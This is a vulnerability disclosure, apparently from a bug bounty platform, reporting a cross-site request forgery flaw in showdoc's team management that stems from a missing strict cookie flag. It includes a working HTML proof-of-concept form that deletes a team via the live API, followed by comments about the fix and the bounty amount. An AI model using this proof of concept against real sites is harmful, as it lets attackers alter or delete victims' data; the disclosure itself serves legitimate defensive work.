Cross-Site Request Forgery (CSRF) in star7th/showdoc
Reported on
Nov 21st 2021
Description
You set the strict flag only for one of your cookies named cookie_token but in Team management attacker still can delete or add teams with CSRF vulnerability as the cookie with name PHPSESSID don't have strict flag.
Proof of Concept
1.replace 38046 with the team id
2.open poc.html and click on submit button.
3.after that the team with id 38046 or your replaced team id will be deleted.
//poc.html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.showdoc.com.cn/server/index.php?s=/api/team/delete" method="POST">
<input type="hidden" name="id" value="38046" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Hey chen
Not fixed and just like before( I logout from the system and login again)
this is a fix commit that have a good fix for strict cookies :
https://github.com/devcode-it/openstamanager/blob/402dca9162a84cf7617a8bbd582aa9ad51259016/core.php#L58
@amammad 👋 it looks like a bug on our side caused the disclosure bounty to be set to $155. We have reset it to the value displayed at disclosure ($64). Apologies for the confusion or inconvenience.
@amammad You can close the browser and open it again. Because the previous phpsessid was automatically maintained by the program, you need to restart the browser to invalidate it. If you log in again, the phpsessid is not regenerated.